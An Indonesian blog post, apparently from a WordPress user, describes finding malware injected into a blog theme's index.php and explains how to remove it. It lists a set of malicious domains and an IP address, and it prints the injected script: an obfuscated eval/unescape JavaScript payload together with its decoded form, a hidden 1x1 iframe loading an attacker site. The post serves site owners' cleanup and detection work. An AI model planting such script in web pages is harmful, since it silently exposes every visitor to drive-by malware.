parasit pada blog

ternyata, blog kita bisa disisipi malware atau serangan scrip yang biasanya disipkan di salah satu file/halaman html maupun php dari blog kita. Pertamanya saya curiga, kenapa blog saya begitu lambat ketika dibuka. Dan seolah ada hang saat loading blog di firefox hampir finish. Lama-lama saya perhatikan, ternyata ada sebuah alamat website yang rasanya janggal dan saya tidak pernah merasa memasang link ke alamat ini. Alamatnya adalah bocpoo.com.
Setelah cari di embah google, ternyata eh ternyata.. alamat ini memang sengaja dipasang di blog oleh seseorang sebagai penyerang dan mencoba menyisipkan scrip. Jadi jika blog anda memanggil alamat ini : artode .com, astnop .com, awotbop .com, baaswer .com, bedfer .com, biawwer .com, bocpoo .com, cedfer .com, chutnot .com, qawfer .com, geezter .com, podfer .com, pukfer .com
anda harus curiga bahwa blog anda memang disusupi scrip jahat. Dan semua alamat ini menuju ke satu IP 121 .156 .57 .184 yang servernya berada di Korea Selatan. Sedangkan semua alamat website diatas terdaftar atas nama Nikenin from Rostov na Donu, Russia.
Nah, lalu bagaimana mengatasinya? Caranya yaitu dengan mencari scrip ini dan menghapusnya.

<script>e val(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%63%70%6F%6F%2E%63%6F%6D%2F%3F%37%30%35%38%39%30%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

Ketika scrip diatas diloading pada browser yang membuka halaman utama blog kita, secara otomatis scrip ini dijalankan :

<iframe src="http://bocpoo.com/?705890" width=1 height=1></iframe>

Dan kebetulan ketika saya mencari scrip ini, saya membuka main page (index.php) pada thema yang dipakai oleh wordpress. Jadi ga terlalu pusing meriksa semua halaman
Untuk test apakah blog anda terkena sang penyusup atau tidak, anda bisa cek di website
http://www.unmaskparasites.com